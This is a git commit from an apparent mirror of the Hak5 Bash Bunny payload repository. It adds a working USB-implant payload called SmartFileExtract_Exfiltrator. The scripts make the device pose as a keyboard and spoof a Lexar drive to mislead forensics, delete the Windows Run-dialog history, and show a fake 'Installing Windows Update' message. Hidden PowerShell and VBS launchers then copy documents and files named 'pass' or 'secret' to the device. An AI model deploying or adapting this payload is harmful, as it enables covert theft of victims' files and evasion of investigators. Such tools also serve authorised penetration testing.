hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added SmartFileExtract payload (#296)

pull/297/merge
saintcrossbow 2017-11-26 20:16:17 -05:00 committed by Sebastian Kinne
parent 53cf608b7f
commit 08c24c4389
6 changed files with 86 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
payloads/library/exfiltration/SmartFileExtract_Exfiltrator/d.cmd Normal file
View File

@ -0,0 +1,4 @@
@echo off
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell"
cscript %~dp0\i.vbs %~dp0\e.cmd
@exit

25
payloads/library/exfiltration/SmartFileExtract_Exfiltrator/e.cmd Normal file
View File

@ -0,0 +1,25 @@
REM Setup required:
REM o Create SFE in the loot directory
REM o Place SmartFileExtract on the root of the bashbunny
@echo off
@echo Installing Windows Update
REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
set dst=%~dp0\..\..\loot\SFE\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul
if Exist %USERPROFILE%\Documents (
%~dp0\..\..\SmartFileExtract /drive c /file *.doc;*pass*.*;*secret* /copyto %dst% /curtain 3 /maxsec 90 /maxmbs 500 >>nul
)
REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
@cls
@exit

1
payloads/library/exfiltration/SmartFileExtract_Exfiltrator/i.vbs Normal file
View File

@ -0,0 +1 @@
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

29
payloads/library/exfiltration/SmartFileExtract_Exfiltrator/payload.txt Normal file
View File

@ -0,0 +1,29 @@
#!/bin/bash
#
# Title: ExecutableInstaller
# Author: IMcPwn (original)
# Additions: SaintCrossbow (only for the parts to run SFE)
# Version: 1.0
# Target: Windows 7+
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn copies payload.exe from the root of the Bash Bunny and then executes it
# using the --startup parameter. Change these settings inside of e.cmd.
#
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R
# Note: Acting as Lexar Compact Flash Drive to throw off forensics
ATTACKMODE HID STORAGE VID_0X05DC PID_0X0081
QUACK DELAY 200
REM --> Minimize all windows
QUACK WINDOWS d
QUACK DELAY 200
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch2\d.cmd')"
QUACK ENTER
LED G

1
payloads/library/exfiltration/SmartFileExtract_Exfiltrator/readme.md Normal file
View File

@ -0,0 +1 @@
# Exfiltrate using SmartFileExtract Utility saintcrossbow@gmail.com ### What is SmartFileExtract anyway? SmartFileExtract is a find-and-copy utility written specifically for the Hak5 BashBunny but also is usable as a standalone utility. Files are found by standard patterns (including wildcards) and then copied to any valid path. Additional features: * Find by seeking keywords in any file. * Use “curtains” that show standard progress, no window, or stealthy windows that are either inconspicuous or look just like a regular install window. * Best of all, stop the copy after a specified time or amount in MBs has been copied - or even stop it manually. No longer worry about pulling the BashBunny while in mid-operation. ### Where do I get it? Download the SmartFileExtract utility from https://github.com/saintcrossbow/SmartFileExtract You will only need the SmartFileExtract.exe from the project root. ### So how does it work? SmartFileExtract runs from the command line using three mandatory parameters: the file pattern to find (/file), the drives to seek (/drive), and where to copy the found files (/copyto). There are additional options to make the extract stealthier. The SmartFileExtract documentation explains in detail, and you can also see options by typing `SmartFileExtract /help` ### What is the payload setup to do? I've included the script that I actually use, which works using IMcPwn's ExecutableInstaller: * Options are in e.cmd file * It finds all documents and any filename with the word “secret” or “pass” in it * Found files are copied to loot directory * It will kill the extract after 90 seconds or after 500 MBs are copied.

26
payloads/library/exfiltration/SmartFileExtract_Exfiltrator/setup.txt Normal file
View File

@ -0,0 +1,26 @@
Method of calling SmartFileExtractor is based on the excellent work of IMcPwn: the ExecutableInstaller.
See the BashBunny Wiki for the original version.
Setup:
- Download the SmartFileExtract utility from https://github.com/saintcrossbow/SmartFileExtract
* Quick tip: you only need the SmartFileExtract.exe from the project root
- Copy SmartFileExtract.exe to the root of the bashubunny
- Change payload.txt:
a) Your file volume name for the bashbunny (if necessary)
b) What kind of device you want the bunny to spoof.
Note: Very much recommend you do this, otherwise will be picked up by forensics
- Change e.cmd:
a) Change your options for Smart File Extract here.
The default payload included in this distribution:
- Looks to Forensics like a Lexar drive (but still called BashBunny)
- Finds all files with a) the word secret or pass in the filename as well as b) any doc files
- Reports status as a fake install window
- Stops extract after 90 seconds or 500 MBs
SmartFileExtract has full documentation on how to use the utility, but if you want to kick the tires and light the fires, run:
smartfileextract /help
Good luck!
Saint Crossbow